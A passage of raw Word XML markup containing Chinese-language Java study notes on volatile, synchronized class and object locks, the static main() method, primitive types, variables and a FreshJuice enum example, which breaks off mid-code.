      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>变量后面的语句放到其前面执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E704797" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24773690" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>注意：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C74E977" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">volatile </w:t>
      </w:r>
      <w:r>
        <w:t>无法保证对变量的任何操作都是原子性，可以采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lock </w:t>
      </w:r>
      <w:r>
        <w:t>或用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">java.util.concurrent.atomic </w:t>
      </w:r>
      <w:r>
        <w:t>包下提供了一些原子操作类来保证操作的原子性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D21B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：多线程访问数据的安全加锁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A735F1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>含义：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>同步，在时间上一致，同速进行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714E2A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用途：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用于修饰方法和代码块</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27472770" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>描述：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:t>语言中用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:t>修饰方法和代码块来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>控制在同一时刻只有一个线程执行该段代码</w:t>
      </w:r>
      <w:r>
        <w:t>，从而保证多并发情况下的数据安全。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>简单讲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是给修饰的方法或代码块声明一个锁，拥有这个锁的线程可以执行区块里面的指令，其他的线程只能等待获取锁，然后才能执行相同的操作</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰方法和代码块通常被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>加锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0AB35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7500F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB224F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79403A5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类锁</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰代码块</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>传入某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>synchronized (XXXX.class)</w:t>
      </w:r>
      <w:r>
        <w:t>）时被称为类锁。某个线程得到了一个类锁之后，其他所有被该类锁加锁方法或代码块是锁定的，其他线程是无法访问的，但是其他线程还是可以访问没有被该类锁加锁的任何代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C1BEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B97ABE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对象锁</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰非静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰代码块</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>传入非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>synchronized this)</w:t>
      </w:r>
      <w:r>
        <w:t>）时被称为对象锁。某个线程得到了对象锁之后，该对象的其他被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized</w:t>
      </w:r>
      <w:r>
        <w:t>修饰的方法（同步方法）是锁定的，其他线程是无法访问的。但是其他线程还是可以访问没有进行同步的方法或者代码；当获取到与对象关联的内置锁时，并不能阻止其他线程访问该对象，当某个线程获得对象的锁之后，只能阻止其他线程获得同一个锁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AAE38E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE8BD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>类锁和对象锁的关系：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>如同每个类只有一个</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>对象而类的实例可以有很多个一样，每个类只有一个类锁，每个实例都有自己的对象锁，所以不同对象实例的对象锁是互不干扰的。但是有一点必须注意的是，其实类锁只是一个概念上的东西，并不是真实存在的，它只是用来帮助我们理解锁定实例方法和静态方法的区别的。类锁和对象锁是不一样的锁，是互相独立的，两者不存在竞争关系，线程获得对象锁的同时，也可以获得该类锁，即同时获得两个锁，这是允许的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE1F20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BCDD3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>其他特性：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>因为被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:t>修饰的代码在同一时刻只有一个线程执行，所以也就保证了操作的原子性和内存可见性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FC24D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714DE1B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>总结：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:t>的本质就是给一段代码加个锁，来保证同一时刻只有一个线程执行该段代码。所以不管是类锁还是对象锁，被加锁了的代码，每个线程只有获取了对应的锁之后才能执行，未加锁的代码任何情况下都能立即执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8BF82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D37C7A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF31AF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对于一些新学习</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的同学比如我，可能会对</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的一些结构包括执行过程有点小懵，比如为什么</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>程序的文件名一定要是和公共类的名称一样，而我们经常写程序的时候总是把</w:t>
      </w:r>
      <w:r>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>方法放在程序的唯一一个公共类中，这又是为什么，难道把</w:t>
      </w:r>
      <w:r>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>方法放在别的类中不行吗？其实我们都知道</w:t>
      </w:r>
      <w:r>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是程序执行的入口，但又还是有些不太理解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5DA87B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4015461C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>实际上，程序中的</w:t>
      </w:r>
      <w:r>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不是必须要放在唯一的一个公共类中的，它可以放在其它类当中，但正常情况下这样做会报错，这是为什么呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是因为程序在执行的过程中第一步是调用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2F6855" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C23549" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982F209" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8C05CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>正常情况下这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件名就是我们程序中的公共类名</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>通过这种方法进行调用</w:t>
      </w:r>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>通过类名进行调用方法</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>并没有创建实例</w:t>
      </w:r>
      <w:r>
        <w:t>进行调用，</w:t>
      </w:r>
      <w:r>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因此这个方法也就必须是类方法也就是静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:t>，这也就解释了为什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法的前面还总是要有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C79510" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE6FDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27063E17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588B2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58403006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F2FF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F219D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179987E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FFC37E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FBAE6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375ED2E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCCC852" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类变量（静态变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2DCFAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成员变量（非静态变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A84EA2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入枚举</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818A160" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java 5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入了枚举，枚举限制变量只能是预先设定好的值。使用枚举可以减少代码中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3E8B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F32C238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，我们为果汁店设计一个程序，它将限制果汁为小杯、中杯、大杯。这就意味着它不允许顾客点除了这三种尺寸外的果汁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795191BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49511717" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class FreshJuice {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFAAF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FreshJuiceSize{ SMALL, MEDIUM , LARGE }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DB45E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   FreshJuiceSize size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D6BAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9839CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EDDCD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class FreshJuiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703DF181" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366D422" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      FreshJuice juice = new FreshJuice();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE4CFFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      juice.size = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
